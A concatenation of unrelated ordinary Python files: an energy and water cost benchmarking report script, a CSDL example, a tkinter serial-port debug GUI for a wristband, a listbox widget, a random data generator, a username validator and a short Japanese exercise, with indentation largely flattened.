'Heating Fuel Usage [MMBTU/yr]', 'Heating Degree Days [Base 65F]',
"Annual Heating Energy Use and Degree Day Comparison", p8g1_filename)
# --- Create Monthly Heating Usage dataframe for graph
# From the main DataFrame, get only the rows for this site, and only get
# the needed columns for this analysis
usage_df1 = df.query('site_id == @site')[['service_type', 'fiscal_year', 'fiscal_mo', 'mmbtu']]
monthly_heating = pd.pivot_table(usage_df1,
values='mmbtu',
index=['fiscal_year', 'fiscal_mo'],
columns=['service_type'],
aggfunc=np.sum
)
# Add in columns for the missing energy services
missing_services = bu.missing_energy_services(monthly_heating.columns)
bu.add_columns(monthly_heating, missing_services)
# Use only heat services
monthly_heating = monthly_heating[bu.all_heat_services]
# Create a total heating column
monthly_heating['total_heating_energy'] = monthly_heating.sum(axis=1)
p8g2_filename, p8g2_url = gu.graph_filename_url(site, "heating_usage_g2")
gu.create_monthly_profile(monthly_heating, 'total_heating_energy', "Monthly Heating Energy Profile [MMBTU]", 'red',
"Monthly Heating Energy Usage Profile by Fiscal Year", p8g2_filename)
# Convert df to dictionary
heating_use_rows = bu.df_to_dictionaries(heating_usage)
# Add data and graphs to a dictionary
template_data = dict(
heating_usage_analysis = dict(
graphs=[p8g1_url, p8g2_url],
table={'rows': heating_use_rows}
)
)
# Using the Utility Cost DataFrame passed in as a parameter,
# Put DataFrame back into ascending order, as we need to calculate
# a percent change column.
# Index is NOT Years
df_utility_cost.sort_values('fiscal_year', ascending=True, inplace=True)
    # Make a total heat cost column and its percent change
df_utility_cost['total_heat_cost'] = df_utility_cost[bu.all_heat_services].sum(axis=1)
df_utility_cost['total_heat_cost_pct_change'] = df_utility_cost.total_heat_cost.pct_change()
# Now back in descending order
df_utility_cost.sort_values('fiscal_year', ascending=False, inplace=True)
cols_to_keep = bu.all_heat_services + ['fiscal_year', 'total_heat_cost','total_heat_cost_pct_change']
# Use only necessary columns
heating_cost = df_utility_cost[cols_to_keep]
cost_cols = [col + "_cost" for col in bu.all_heat_services]
cost_col_dict = dict(zip(bu.all_heat_services, cost_cols))
# Change column names so they aren't the same as the heating usage dataframe
heating_cost = heating_cost.rename(columns=cost_col_dict)
# Combine the heating cost and heating use dataframes
heating_cost_and_use = pd.merge(heating_cost, heating_usage, left_on='fiscal_year', right_index=True, how='right')
# Put DataFrame in ascending order to calculate percent change
heating_cost_and_use.sort_values('fiscal_year', ascending=True, inplace=True)
# This will be used to shorten final dataframe
final_cost_col_list = list(cost_cols)
# Create percent change columns
for col in cost_cols:
new_col = col.split('_cost')[0] + '_pct_change'
heating_cost_and_use[new_col] = heating_cost_and_use[col].pct_change()
final_cost_col_list.append(new_col)
# Back to descending order
heating_cost_and_use.sort_values('fiscal_year', ascending=False, inplace=True)
# Create unit cost columns
for col in cost_cols:
n_col = col.split('_cost')[0] + '_unit_cost'
mmbtu_col = col.split('_cost')[0] + '_mmbtu'
heating_cost_and_use[n_col] = heating_cost_and_use[col] / heating_cost_and_use[mmbtu_col]
final_cost_col_list.append(n_col)
heating_cost_and_use['building_heat_unit_cost'] = heating_cost_and_use.total_heat_cost / heating_cost_and_use.total_heat_mmbtu
# Remove all columns not needed for the Heating Cost Analysis Table
final_cost_col_list = final_cost_col_list + ['fiscal_year','building_heat_unit_cost',
'total_heat_cost','total_heat_cost_pct_change']
heating_cost_and_use = heating_cost_and_use[final_cost_col_list]
# ---- Create DataFrame with the Monthly Average Price Per MMBTU for All Sites
# Filter out natural gas customer charges as the unit cost goes to infinity if there is a charge but no use
df_no_gas_cust_charges = df.drop(df[(df['service_type'] == 'natural_gas') & (df['units'] != 'CCF')].index)
# Filter out records with zero usage, which correspond to things like customer charges, etc.
nonzero_usage = df_no_gas_cust_charges.query("usage > 0")
nonzero_usage = nonzero_usage.query("mmbtu > 0")
# Filter out zero cost or less records (these are related to waste oil)
nonzero_usage = nonzero_usage.query("cost > 0")
# Get the total fuel cost and usage for all buildings by year and month
grouped_nonzero_usage = nonzero_usage.groupby(['service_type', 'fiscal_year', 'fiscal_mo']).sum()
# Divide the total cost for all building by the total usage for all buildings so that the average is weighted correctly
grouped_nonzero_usage['avg_price_per_mmbtu'] = grouped_nonzero_usage.cost / grouped_nonzero_usage.mmbtu
# Get only the desired outcome, price per million BTU for each fuel type, and the number of calendar months it is based on
# i.e. the number of months of bills for each fuel for all buildings for that particular month.
grouped_nonzero_usage = grouped_nonzero_usage[['avg_price_per_mmbtu', 'cal_mo']]
# Drop electricity from the dataframe.
grouped_nonzero_usage = grouped_nonzero_usage.reset_index()
    grouped_nonzero_heatfuel_use = grouped_nonzero_usage.query("service_type != 'electricity'")
# Create a column for each service type
grouped_nonzero_heatfuel_use = pd.pivot_table(grouped_nonzero_heatfuel_use,
values='avg_price_per_mmbtu',
index=['fiscal_year', 'fiscal_mo'],
columns='service_type'
)
grouped_nonzero_heatfuel_use = grouped_nonzero_heatfuel_use.reset_index()
# --- Monthly Cost Per MMBTU: Data and Graphs
# Exclude other charges from the natural gas costs. This is because the unit costs for natural gas go to infinity
# when there is zero usage but a customer charge
cost_df1 = df.drop(df[(df['service_type'] == 'natural_gas') & (df['units'] != 'CCF')].index)
# Create cost dataframe for given site from processed data
cost_df1 = cost_df1.query('site_id == @site')[['service_type', 'fiscal_year', 'fiscal_mo', 'cost']]
# Split out by service type
monthly_heating_cost = pd.pivot_table(cost_df1,
values='cost',
index=['fiscal_year', 'fiscal_mo'],
columns=['service_type'],
aggfunc=np.sum
)
# Add in columns for the missing energy services
missing_services = bu.missing_energy_services(monthly_heating_cost.columns)
bu.add_columns(monthly_heating_cost, missing_services)
monthly_heating_cost = monthly_heating_cost[bu.all_heat_services]
# Create a total heating column
monthly_heating_cost['total_heating_cost'] = monthly_heating_cost.sum(axis=1)
monthly_heating_cost = monthly_heating_cost.rename(columns=cost_col_dict)
monthly_heat_energy_and_use = pd.merge(monthly_heating_cost, monthly_heating, left_index=True, right_index=True, how='outer')
# Create unit cost columns in $ / MMBTU for each fuel type
for col in cost_cols:
n_col_name = col.split('_cost')[0] + "_unit_cost"
use_col_name = col.split('_cost')[0]
monthly_heat_energy_and_use[n_col_name] = monthly_heat_energy_and_use[col] / monthly_heat_energy_and_use[use_col_name]
monthly_heat_energy_and_use['building_unit_cost'] = monthly_heat_energy_and_use.total_heating_cost / monthly_heat_energy_and_use.total_heating_energy
# Reset the index for easier processing
monthly_heat_energy_and_use = monthly_heat_energy_and_use.reset_index()
# Add in unit costs for fuels that are currently blank
# Get only columns that exist in the dataframe
available_service_list = list(grouped_nonzero_heatfuel_use.columns.values)
heat_services_in_grouped_df = list(set(bu.all_heat_services) & set(available_service_list))
unit_cost_cols = [col + "_unit_cost" for col in heat_services_in_grouped_df]
service_types = [col + "_avg_unit_cost" for col in heat_services_in_grouped_df]
unit_cost_dict = dict(zip(unit_cost_cols,service_types))
# Add in average unit costs calculated from all sites for each month
monthly_heat_energy_and_use = pd.merge(monthly_heat_energy_and_use, grouped_nonzero_heatfuel_use,
left_on=['fiscal_year', 'fiscal_mo'], right_on=['fiscal_year', 'fiscal_mo'],
how='left', suffixes=('', '_avg_unit_cost'))
# Check each column to see if it is NaN (identified when the value does not equal itself) and if it is, fill with the average
# price per MMBTU taken from all sites
for col, service in unit_cost_dict.items():
monthly_heat_energy_and_use[col] = np.where(monthly_heat_energy_and_use[col] != monthly_heat_energy_and_use[col],
monthly_heat_energy_and_use[service],
monthly_heat_energy_and_use[col])
# Add calendar year and month columns
cal_year = []
cal_mo = []
for fiscal_year, fiscal_mo in zip(monthly_heat_energy_and_use.fiscal_year, monthly_heat_energy_and_use.fiscal_mo):
CalYear, CalMo = bu.fiscal_to_calendar(fiscal_year, fiscal_mo)
cal_year.append(CalYear)
cal_mo.append(CalMo)
monthly_heat_energy_and_use['calendar_year'] = cal_year
monthly_heat_energy_and_use['calendar_mo'] = cal_mo
# Create a date column using the calendar year and month to pass to the graphing function
def get_date(row):
return datetime.date(year=row['calendar_year'], month=row['calendar_mo'], day=1)
monthly_heat_energy_and_use['date'] = monthly_heat_energy_and_use[['calendar_year','calendar_mo']].apply(get_date, axis=1)
p9g1_filename, p9g1_url = gu.graph_filename_url(site, "heating_cost_g1")
gu.fuel_price_comparison_graph(monthly_heat_energy_and_use, 'date', unit_cost_cols, 'building_unit_cost', p9g1_filename)
# --- Realized Savings from Fuel Switching: Page 9, Graph 2
# Create an indicator for whether a given heating fuel is available for the facility. This is done by checking the use for all
# months- if it is zero, then that building doesn't have the option to use that type of fuel.
for col in bu.all_heat_services:
new_col_name = col + "_available"
monthly_heat_energy_and_use[new_col_name] = np.where(monthly_heat_energy_and_use[col].sum() == 0, 0, 1)
# Calculate what it would have cost if the building used only one fuel type
available_cols = []
unit_cost_cols_2 = []
for col in bu.all_heat_services:
available_cols.append(col + "_available")
unit_cost_cols_2.append(col + "_unit_cost")
available_dict = dict(zip(unit_cost_cols_2, available_cols))
hypothetical_cost_cols = []
for unit_cost, avail_col in available_dict.items():
new_col_name = unit_cost + "_hypothetical"
hypothetical_cost_cols.append(new_col_name)
monthly_heat_energy_and_use[new_col_name] = monthly_heat_energy_and_use[unit_cost] * monthly_heat_energy_and_use.total_heating_energy * monthly_heat_energy_and_use[avail_col]
# Calculate the monthly savings to the building by not using the most expensive available fuel entirely
monthly_heat_energy_and_use['fuel_switching_savings'] = monthly_heat_energy_and_use[hypothetical_cost_cols].max(axis=1) - monthly_heat_energy_and_use.total_heating_cost
# Sort dataframe to calculate cumulative value
monthly_heat_energy_and_use = monthly_heat_energy_and_use.sort_values(by='date', ascending=True)
# Calculate cumulative value
monthly_heat_energy_and_use['cumulative_fuel_switching_savings'] = np.cumsum(monthly_heat_energy_and_use.fuel_switching_savings)
p9g2_filename, p9g2_url = gu.graph_filename_url(site, "heating_cost_g2")
gu.create_monthly_line_graph(monthly_heat_energy_and_use, 'date', 'cumulative_fuel_switching_savings',
'Cumulative Fuel Switching Savings Realized [$]', p9g2_filename)
# Convert df to dictionary
heating_cost_rows = bu.df_to_dictionaries(heating_cost_and_use)
# Add data and graphs to main dictionary
template_data['heating_cost_analysis'] = dict(
graphs=[p9g1_url, p9g2_url],
table={'rows': heating_cost_rows},
)
return template_data
# ---------------------- Water Analysis Table ---------------------------
def water_report(site, df):
water_use = df.query('site_id == @site')[['service_type', 'fiscal_year', 'fiscal_mo','cost', 'usage', 'units']]
# Abort if no data
if water_use.empty:
return {}
# Create month count field for all months that have water and sewer bills
water_use_only = water_use.query("service_type == 'water'")
water_months_present = bu.months_present(water_use_only)
water_mo_count = bu.month_count(water_months_present)
# Create annual water gallon usage dataframe
water_gal_df = pd.pivot_table(water_use,
values='usage',
index=['fiscal_year',],
columns=['service_type'],
aggfunc=np.sum
)
# Add in columns for the missing services
gal_missing_services = bu.missing_services(water_gal_df.columns)
bu.add_columns(water_gal_df, gal_missing_services)
# Use only required columns
water_gal_df = water_gal_df[['water']]
# Calculate percent change column
water_gal_df['water_use_pct_change'] = water_gal_df.water.pct_change()
# Create annual water and sewer cost dataframe
water_cost_df = pd.pivot_table(water_use,
values='cost',
index=['fiscal_year',],
columns=['service_type'],
aggfunc=np.sum
)
# Add in columns for the missing services
water_missing_services = bu.missing_services(water_cost_df.columns)
bu.add_columns(water_cost_df, water_missing_services)
# Calculate totals, percent change
cols_to_remove = bu.all_energy_services + ['refuse']
water_cost_df = water_cost_df[water_cost_df.columns.difference(cols_to_remove)]
rename_dict = {'sewer': 'Sewer Cost',
'water': 'Water Cost'}
water_cost_df = water_cost_df.rename(columns=rename_dict)
    # Calculate the total water and sewer cost (missing sewer data was filled in above)
water_cost_df['total_water_sewer_cost'] = water_cost_df.sum(axis=1)
water_cost_df['water_cost_pct_change'] = water_cost_df['Water Cost'].pct_change()
water_cost_df['sewer_cost_pct_change'] = water_cost_df['Sewer Cost'].pct_change()
water_cost_df['total_water_sewer_cost_pct_change'] = water_cost_df.total_water_sewer_cost.pct_change()
# Merge use and cost dataframes
water_use_and_cost = pd.merge(water_cost_df, water_gal_df, left_index=True, right_index=True, how='left')
water_use_and_cost['water_unit_cost'] = water_use_and_cost.total_water_sewer_cost / water_use_and_cost.water
water_use_and_cost['water_unit_cost_pct_change'] = water_use_and_cost.water_unit_cost.pct_change()
# Use only complete years
water_use_and_cost['month_count'] = water_mo_count
if len(water_use_and_cost):
water_use_and_cost = water_use_and_cost.query("month_count == 12")
water_use_and_cost = water_use_and_cost.drop('month_count', axis=1)
water_use_and_cost = water_use_and_cost.sort_index(ascending=False)
water_use_and_cost = water_use_and_cost.rename(columns={'Sewer Cost':'sewer_cost',
'Water Cost':'water_cost',
'total_water_sewer_cost':'total_cost',
'total_water_sewer_cost_pct_change':'total_cost_pct_change',
'water':'total_usage',
'water_use_pct_change':'total_usage_pct_change',
'water_unit_cost':'total_unit_cost',
'water_unit_cost_pct_change':'total_unit_cost_pct_change'
})
# ---- Create Water Cost Stacked Bar Graph - Page 10 Graph 1
p10g1_filename, p10g1_url = gu.graph_filename_url(site, "water_analysis_g1")
gu.create_stacked_bar(water_use_and_cost.reset_index(), 'fiscal_year', ['sewer_cost', 'water_cost'],
'Utility Cost [$]', "Annual Water and Sewer Costs", p10g1_filename)
# ---- Create Monthly Water Profile Graph
# Create monthly water gallon dataframe
water_gal_df_monthly = pd.pivot_table(water_use,
values='usage',
index=['fiscal_year', 'fiscal_mo'],
columns=['service_type'],
aggfunc=np.sum
)
p10g2_filename, p10g2_url = gu.graph_filename_url(site, "water_analysis_g2")
if 'water' in list(water_gal_df_monthly.columns.values):
gu.create_monthly_profile(water_gal_df_monthly, 'water', 'Monthly Water Usage Profile [gallons]', 'green',
"Monthly Water Usage Profile by Fiscal Year", p10g2_filename)
else:
shutil.copyfile(os.path.abspath('no_data_available.png'), os.path.abspath(p10g2_filename))
# Convert df to dictionary
water_rows = bu.df_to_dictionaries(water_use_and_cost)
# Return data and graphs in a dictionary
return dict(
water_analysis = dict(
graphs=[p10g1_url, p10g2_url],
table={'rows': water_rows}
)
)
#******************************************************************************
#******************************************************************************
# ----------------------------- Misc Functions --------------------------------
# Time when the script started running. Used to determine cumulative time
start_time = None
def msg(the_message):
"""Prints a message to the console, along cumulative elapsed time
since the script started.
"""
print('{} ({:.1f} s)'.format(the_message, time.time() - start_time))
#*****************************************************************************
#*****************************************************************************
# ----------------------------- Main Script -----------------------------------
if __name__=="__main__":
# Save the time when the script started, so cumulative times can be
# shown in messages printed to the console.
start_time = time.time()
msg('Benchmarking Script starting!')
# Get a Date/Time String for labeling this report
report_date_time = datetime.datetime.now().strftime('%B %d, %Y %I:%M %p')
# Read and Preprocess the data in the Utility Bill file, acquiring
# a DataFrame of preprocessed data and a utility function object that is
# needed by the analysis routines.
if settings.USE_DATA_FROM_LAST_RUN:
# Read the data from the pickle files that were created during the
# last run of the script.
df = pickle.load(open('df_processed.pkl', 'rb'))
util_obj = pickle.load(open('util_obj.pkl', 'rb'))
msg('Data from Last Run has been loaded.')
else:
# Run the full reading and processing routine
df_raw, df, util_obj = preprocess_data()
# Pickle the DataFrames and utility object for fast
# loading later, if needed
df_raw.to_pickle('df_raw.pkl')
df.to_pickle('df_processed.pkl')
pickle.dump(util_obj, open('util_obj.pkl', 'wb'))
# We no longer need the raw DataFrame, so delete it to
# save memory
del df_raw
# Clean out the output directories to prepare for the new report files
out_dirs = [
'output/debug',
'output/extra_data',
'output/images',
'output/sites'
]
for out_dir in out_dirs:
for fn in glob.glob(os.path.join(out_dir, '*')):
if not 'placeholder' in fn: # don't delete placeholder file
os.remove(fn)
# Create Index (Home) page
site_cats = util_obj.site_categories_and_buildings()
template_data = dict(
date_updated = report_date_time,
categories = site_cats
)
ix_template = template_util.get_template('index.html')
result = ix_template.render(template_data)
open('output/index.html', 'w').write(result)
# ------ Loop through the sites, creating a report for each
# Get the template used to create the site benchmarking report.
site_template = template_util.get_template('sites/index.html')
    site_count = 0  # tracks the number of sites processed
for site_id in util_obj.all_sites():
# This line shortens the calculation process to start with whatever
# Site ID you want to start with
# if site_id < '1187': continue
msg("Site '{}' is being processed...".format(site_id))
# Gather template data from each of the report sections. The functions
# return a dictionary with variables needed by the template. Sometimes other
# values are returned from the function, often for use in later reports.
template_data = building_info_report(site_id, util_obj, report_date_time)
report_data = energy_index_report(site_id, df, util_obj)
template_data.update(report_data)
report_data, df_utility_cost = utility_cost_report(site_id, df, util_obj)
template_data.update(report_data)
# Filter down to just this site's bills and only services that
# are energy services in order to determine whether there are any
# energy services. Only do energy reports if there are some energy
# services
energy_services = bu.missing_energy_services([])
df1 = df.query('site_id==@site_id and service_type==@energy_services')
if not df1.empty:
report_data, df_usage = energy_use_cost_reports(site_id, df, util_obj, df_utility_cost)
template_data.update(report_data)
report_data = electrical_usage_and_cost_reports(site_id, df)
template_data.update(report_data)
#df_utility_cost.to_pickle('df_utility_cost.pkl')
#df_usage.to_pickle('df_usage.pkl')
#import sys; sys.exit()
report_data = heating_usage_cost_reports(site_id, df, util_obj, df_utility_cost, df_usage)
template_data.update(report_data)
report_data = water_report(site_id, df)
template_data.update(report_data)
# save template data variables to debug file if requested
if settings.WRITE_DEBUG_DATA:
with open('output/debug/{}.vars'.format(site_id), 'w') as fout:
pprint.pprint(template_data, fout)
# create report file
result = site_template.render(template_data)
with open('output/sites/{}.html'.format(site_id), 'w') as fout:
fout.write(result)
site_count += 1
if site_count == settings.MAX_NUMBER_SITES_TO_RUN:
break
print()
msg('Benchmarking Script Complete!')
|
def example(Simulator):
from csdl import Model
import csdl
import numpy as np
class ExampleSimple(Model):
def define(self):
x = self.declare_variable('x')
y = self.declare_variable('y')
a = x + y
b = x + y
c = 2 * a
d = 2 * b
self.register_output('c', c)
self.register_output('d', d)
sim = Simulator(ExampleSimple())
sim.run()
    print('c', sim['c'].shape)
    print(sim['c'])
    print('d', sim['d'].shape)
    print(sim['d'])
return sim |
#!/usr/bin/env python
import tkinter as tk
import serial
#import serial.tools.list_ports
import os
from random import Random
from time import sleep
import threading
master_ser = serial.Serial("COM30",115200,timeout=1)
window = tk.Tk()
window.title('My Window')
window.geometry('500x300')
cmd = [0x00,0x00]
l = tk.Label(window, bg='green', fg='white', width=20, text='手环调试工具')
l.pack()
def print_selection(v):
l.config(text='you have selected ' + v)
print(v)
v_str = 'AT+TP+VAL=' + str(v) + '\r\n'
master_ser.write(v_str.encode("utf-8"))
def button_up():
master_ser.write(('AT+TP+UP\r\n').encode("utf-8"))
def button_down():
master_ser.write(('AT+TP+DOWN\r\n').encode("utf-8"))
def button_left():
master_ser.write(('AT+TP+LEFT\r\n').encode("utf-8"))
def button_right():
master_ser.write(('AT+TP+RIGHT\r\n').encode("utf-8"))
def button_fun_1():
master_ser.write(('AT+TP+F1\r\n').encode("utf-8"))
def button_fun_2():
master_ser.write(('AT+TP+F2\r\n').encode("utf-8"))
def button_fun_3():
master_ser.write(('AT+TP+F3\r\n').encode("utf-8"))
s = tk.Scale(window, label='try me', from_=0, to=390, orient=tk.HORIZONTAL, length=400, showvalue=0,tickinterval=40, resolution=1, command=print_selection)
s.pack()
b_0 = tk.Button(window, text = "上键", command = button_up)
b_0.place(x = 100, y = 100, width=40, height=25)
#b_0.pack()
b_1 = tk.Button(window, text = "下键", command = button_down)
b_1.place(x = 100, y = 200, width=40, height=25)
b_2 = tk.Button(window, text = "左键", command = button_left)
b_2.place(x = 180, y = 150, width=40, height=25)
b_3 = tk.Button(window, text = "右键", command = button_right)
b_3.place(x = 20, y = 150, width=40, height=25)
b_3 = tk.Button(window, text = "功能一", command = button_fun_1)
b_3.place(x = 400, y = 100, width=40, height=25)
b_3 = tk.Button(window, text = "功能二", command = button_fun_2)
b_3.place(x = 400, y = 150, width=40, height=25)
b_3 = tk.Button(window, text = "功能三", command = button_fun_3)
b_3.place(x = 400, y = 200, width=40, height=25)
#b_1.pack()
def mouse_press(event):
print('鼠标按下')
master_ser.write(('AT+TP+P\r\n').encode("utf-8"))
def mouse_release(event):
print('鼠标抬起')
master_ser.write(('AT+TP+Rel\r\n').encode("utf-8"))
s.bind('<ButtonPress-1>',mouse_press)
s.bind('<ButtonRelease-1>',mouse_release)
window.mainloop()
master_ser.close()
print("测试程序结束!")
|
import tkinter
import tkinter.tix
from scripts import Warnings, Constants
from scripts.frontend.custom_widgets import CustomLabels
from scripts.frontend.custom_widgets.WidgetInterface import WidgetInterface
class Frame(tkinter.Frame, WidgetInterface):
_selected = "Number of Selected Items: "
def __init__(self, root, multi_select=False, select_change_command=None):
tkinter.Frame.__init__(self, root)
self.grid(padx=Constants.STANDARD_SPACING, pady=Constants.STANDARD_SPACING)
self.grid(sticky=tkinter.NSEW)
# Selection logic
self.selected_index_listbox = -1
self.selected_index_sorted_listbox = -1
self.select_change_command = select_change_command
# Configures weights
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=0)
self.columnconfigure(1, weight=0)
self.columnconfigure(2, weight=1)
self.columnconfigure(3, weight=0)
# Creates the scroll bar
self.scrollbar = tkinter.Scrollbar(self, orient=tkinter.VERTICAL)
self.scrollbar.grid(column=3, row=0)
self.scrollbar.grid(columnspan=1, rowspan=1)
self.scrollbar.grid(padx=Constants.SHORT_SPACING, pady=Constants.SHORT_SPACING)
self.scrollbar.grid(sticky=tkinter.NS)
# Initializes the list box
self.listbox = tkinter.Listbox(self, selectmode=tkinter.SINGLE,
yscrollcommand=self.listbox_scroll, exportselection=False)
self.listbox.grid(column=2, row=0)
self.listbox.grid(columnspan=1, rowspan=1)
self.listbox.grid(padx=Constants.SHORT_SPACING, pady=Constants.SHORT_SPACING)
self.listbox.grid(sticky=tkinter.NSEW)
# Initializes the listbox that displays the sorted data values
self.sorted_listbox = tkinter.Listbox(self, selectmode=tkinter.SINGLE, width=3,
yscrollcommand=self.sorted_listbox_scroll, exportselection=True)
self.sorted_listbox.grid(column=1, row=0)
self.sorted_listbox.grid(columnspan=1, rowspan=1)
self.sorted_listbox.grid(padx=Constants.SHORT_SPACING, pady=Constants.SHORT_SPACING)
self.sorted_listbox.grid(sticky=tkinter.NS)
# Creates selectable scroll bar
self.multi_select = multi_select
self.selectbox = None
if multi_select is True:
self.selectbox = tkinter.Listbox(
self, width=2, exportselection=False,
selectmode=tkinter.MULTIPLE, yscrollcommand=self.selectbox_scroll)
self.selectbox.grid(column=0, row=0)
self.selectbox.grid(columnspan=1, rowspan=1)
self.selectbox.grid(padx=Constants.SHORT_SPACING, pady=Constants.SHORT_SPACING)
self.selectbox.grid(sticky=tkinter.NS)
# Links the scrollbar to the listbox (so you can move listbox view with the scrollbar)
self.scrollbar.config(command=self.listbox.yview)
if multi_select is True:
self.scrollbar.config(command=self.scroll)
# Selected count
        self.selected_count_label = CustomLabels.SearchLabel(
self,
column=0, row=2,
columnspan=3,
text=Frame._selected + str(self.num_selected()))
self.selected_count_label.grid_remove()
def update_colour(self):
super().update_colour()
self.selected_count_label.update_colour()
def update_content(self):
super().update_content()
# Selection Activation
selection_changed = False
if self.listbox.size() > 0: # TODO, add a function that will trigger upon select change
if len(self.listbox.curselection()) > 0 and self.selected_index_listbox != self.listbox.curselection()[0]:
self.selected_index_listbox = self.listbox.curselection()[0]
self.sorted_listbox.selection_clear(0, tkinter.END)
self.sorted_listbox.selection_set(self.selected_index_listbox)
self.selected_index_sorted_listbox = self.selected_index_listbox
selection_changed = True
elif len(self.sorted_listbox.curselection()) > 0 and \
self.selected_index_sorted_listbox != self.sorted_listbox.curselection()[0]:
self.selected_index_sorted_listbox = self.sorted_listbox.curselection()[0]
self.listbox.selection_clear(0, tkinter.END)
self.listbox.selection_set(self.selected_index_sorted_listbox)
self.selected_index_listbox = self.selected_index_sorted_listbox
selection_changed = True
if (selection_changed is True) and (self.select_change_command is not None):
self.select_change_command()
# Selected Count
if self.num_selected() != 0:
self.selected_count_label.config(text=Frame._selected + str(self.num_selected()))
self.selected_count_label.grid()
else:
self.selected_count_label.grid_remove()
# Synchronous scrolling of both list boxes
def scroll(self, *args):
self.listbox.yview(*args)
self.selectbox.yview(*args)
def listbox_scroll(self, *args):
if (self.selectbox is not None) and (self.listbox.yview() != self.selectbox.yview()):
self.selectbox.yview_moveto(args[0])
if self.listbox.yview() != self.sorted_listbox.yview():
self.sorted_listbox.yview_moveto(args[0])
self.scrollbar.set(*args)
def sorted_listbox_scroll(self, *args):
if (self.selectbox is not None) and (self.sorted_listbox.yview() != self.selectbox.yview()):
self.selectbox.yview_moveto(args[0])
if self.sorted_listbox.yview() != self.listbox.yview():
self.listbox.yview_moveto(args[0])
self.scrollbar.set(*args)
def selectbox_scroll(self, *args):
if self.selectbox.yview() != self.listbox.yview():
self.listbox.yview_moveto(args[0])
if self.selectbox.yview() != self.sorted_listbox.yview():
self.sorted_listbox.yview_moveto(args[0])
self.scrollbar.set(*args)
# More functionality methods
def get_selected_multi(self):
if self.multi_select is True:
return self.selectbox.curselection()
else:
return ()
def get_selected_main(self):
if self.is_selected_main():
return self.listbox.curselection()[0]
else:
return None
def is_selected_main(self):
return len(self.listbox.curselection()) > 0
def unselect_main(self):
# Clears the selection
self.listbox.selection_clear(0, tkinter.END)
self.sorted_listbox.selection_clear(0, tkinter.END)
# Resets select index
self.selected_index_listbox = -1
self.selected_index_sorted_listbox = -1
def num_selected(self):
return len(self.get_selected_multi())
def add_to_list(self, item_display_name, item_display_sorted, index=tkinter.END):
# Computes the index
if index == tkinter.END:
index = self.listbox.size()
# Adds the item to the index
self.listbox.insert(index, item_display_name)
self.sorted_listbox.insert(index, str(item_display_sorted))
if self.selectbox is not None:
selectbox_text = " " + str(index)
self.selectbox.insert(index, selectbox_text)
self.selectbox.config(width=len(selectbox_text))
return True
def remove_from_list(self, item_display_name):
# Find the index of the item
found = False
index = 0
for index in range(0, self.listbox.size()):
            if self.listbox.get(index) == item_display_name:
found = True
break
# Removes the item
if found is True:
            # Removes the item at index from every synchronized list box,
            # then rebuilds the lists so the selection numbering stays correct
            remaining_names = list(self.listbox.get(0, tkinter.END))
            remaining_sorted = list(self.sorted_listbox.get(0, tkinter.END))
            del remaining_names[index], remaining_sorted[index]
            self.replace_list(remaining_names, remaining_sorted)
return True
else:
Warnings.not_to_reach()
return False
def replace_list(self, new_list, new_sorted_list):
assert len(new_list) == len(new_sorted_list)
# Sets the appropriate width of the sorted column
max_width = 1
for item in new_sorted_list:
if len(str(item)) > max_width:
                max_width = len(str(item))
self.sorted_listbox.config(width=max_width)
# Removes all items
self.listbox.delete(0, tkinter.END)
self.sorted_listbox.delete(0, tkinter.END)
if self.multi_select is True:
self.selectbox.delete(0, tkinter.END)
# Deletes and re-adds the items
for index in range(0, len(new_list)):
self.add_to_list(new_list[index], new_sorted_list[index])
# Resets select index
self.selected_index_listbox = -1
self.selected_index_sorted_listbox = -1
return True
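# A minimal usage sketch (hypothetical data; assumes the scripts.* package imported
# above is on the path, so this is illustrative rather than runnable in isolation):
#
#   root = tkinter.Tk()
#   frame = Frame(root, multi_select=True,
#                 select_change_command=lambda: print("selection changed"))
#   frame.replace_list(["Model A", "Model B", "Model C"], [0.91, 0.87, 0.64])
#   root.mainloop()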
|
import string
import random
import sys
args = sys.argv
N = int(args[1])
M = int(args[2])
saida = args[3]
pontos = []
letras = string.hexdigits
for i in range(N):
ponto = []
ponto.append("".join(random.choice(letras) for i in range(random.randint(1, 31))))
tem_repetido = True
while tem_repetido:
tem_repetido = False
coordenadas = []
for i in range(M):
coordenadas.append(random.random() * 10)
for i, ponto_obs in enumerate(pontos):
if i == 0:
continue
iguais = 0
for coord in coordenadas:
tem_igual = all(elemento == coord for elemento in ponto_obs)
if tem_igual:
iguais += 1
if iguais == len(coordenadas):
tem_repetido = True
if tem_repetido:
continue
else:
break
ponto.append(coordenadas)
pontos.append(ponto)
f = open(saida, "w")
for ponto in pontos:
f.write(ponto[0])
for coord in ponto[1]:
f.write(",")
f.write(str(coord))
f.write("\n")
f.close()
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Validators for user profiles."""
from __future__ import absolute_import, print_function
import re
from flask_babelex import lazy_gettext as _
username_regex = re.compile('^[a-zA-Z][a-zA-Z0-9-_]{2}[a-zA-Z0-9-_]*$')
"""Username rules."""
USERNAME_RULES = _(
'Username must start with a letter, be at least three characters long and'
' only contain alphanumeric characters, dashes and underscores.')
"""Description of username validation rules.
.. note:: Used for both form help text and for form validation error."""
def validate_username(username):
"""Validate the username.
See :data:`~.username_regex` to know which rules are applied.
:param username: A username.
:raises ValueError: If validation fails.
"""
if not username_regex.match(username):
raise ValueError(USERNAME_RULES)
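# A minimal usage sketch (illustrative usernames, not part of Invenio itself):
#
#   validate_username('jane_doe-42')   # passes: starts with a letter, length >= 3
#   validate_username('1jane')         # raises ValueError(USERNAME_RULES)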
|
# x_6_4
#
# セリーグの対戦カードの組み合わせを「巨人 x 阪神」のように表示してください(ただし同一チーム同志は対戦しないこと)
central_league = ['巨人', 'ヤクルト', '横浜', '中日', '阪神', '広島']
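# One possible solution sketch: itertools.combinations yields each pairing once and
# never pairs a team with itself. If the exercise expects both "巨人 x 阪神" and
# "阪神 x 巨人", swap in itertools.permutations instead.
from itertools import combinations

for team_a, team_b in combinations(central_league, 2):
    print('{} x {}'.format(team_a, team_b))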
|
#MIT License
#Copyright (c) 2021 Jonatan Asensio Palao
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
